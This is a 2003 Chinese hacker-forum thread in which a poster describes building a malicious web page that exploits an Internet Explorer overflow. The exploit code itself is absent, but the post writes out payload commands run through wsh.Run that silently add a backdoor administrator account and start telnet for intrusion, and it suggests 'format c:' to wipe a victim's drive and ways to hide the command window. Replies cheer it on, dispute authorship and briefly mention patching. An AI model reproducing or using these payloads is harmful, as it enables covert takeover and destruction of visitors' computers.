黑色海岸线论坛 - Powered by Discuz! Board

标题: [原创]利用IE漏洞来制作网页木马~ [打印本页]

作者: Virus80y 时间: 2003-8-26 22:24 标题: [原创]利用IE漏洞来制作网页木马~

利用IE的漏洞可以让IE益出,下面SHOW出利用代码为了避免不露出马脚,建议使用一个页面引出木马页面.

说明:此为HTML语句,另外打开为http://127.0.0.1/test.test的网页文件 test.test代码

说明:此代码为HTML代码,后缀名可以改成任意的,最好是小于4位.... wsh.Run("cmd.exe /k net user Virus80y 1q2w3e4r5t6y7u8i9o0p /add") //执行益出代码后,调用CMD ,添加用户名 wsh.Run("cmd.exe /k net localgroup administrators Virus80y /add") //把新加用户名设置为ADMIN wsh.Run("cmd.exe /k net start telnet") //开启TELNET,方便入侵在cmd.exe后面可以加入DOS命令,如format c:.这样就把别人的C盘干掉了./k 为隐藏所执行的DOS命令.这样别人只看见CMD的窗口,并没有看见执行了什么命令. 我推荐加入/m /k参数.功能是执行命令的时候窗口最小化,而且隐藏所执行的命令. DOS的功能挺多,只有想不到的,没有做不到的.

作者: 风雪侠剑 时间: 2003-8-27 13:35 标题: [原创]利用IE漏洞来制作网页木马~

我顶!!!!!!!!!!!!~~~~~~~~~~~~~

作者: 默读忧伤 时间: 2003-8-27 23:44 标题: [原创]利用IE漏洞来制作网页木马~

有什么预防的方法吗？

作者: 智涌 时间: 2003-8-27 23:56 标题: [原创]利用IE漏洞来制作网页木马~

下面引用由默读忧伤在 2003/08/27 11:44pm 发表的内容：
有什么预防的方法吗？

当然是打补丁罗

作者: damnyou 时间: 2003-8-28 03:44 标题: [原创]利用IE漏洞来制作网页木马~

下面引用由默读忧伤在 2003/08/27 11:44pm 发表的内容：
有什么预防的方法吗？

如果是以GUEST身份登陆主机当然是加不了用户的咯,因为他没权限.
所以有一句话:不要以SYSTEM权限在主机上开服务,或者进行什么操作.
这样比较安全

作者: Linyin 时间: 2003-8-28 05:35 标题: [原创]利用IE漏洞来制作网页木马~

小子,你还真会装呢
我给你看下就马上D版去了
呵呵,还好,你小子工夫还不到家,就看到了一半
记住,以后不要D了,也别加上啥原创,丢人

作者: Virus80y 时间: 2003-8-29 13:36 标题: [原创]利用IE漏洞来制作网页木马~

并不是我D你的，这个漏洞是早就出来了的。不过你又让我想起来了。好东西应该让大家分享一下，我的东西比你的更好。

作者: 情绪 时间: 2003-8-30 05:11 标题: [原创]利用IE漏洞来制作网页木马~

我靠，这你都想的出来！
人家还用3721干什么！

作者: 情绪 时间: 2003-9-12 16:23 标题: [原创]利用IE漏洞来制作网页木马~

晕死，这个是不可能的，实现不了。

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)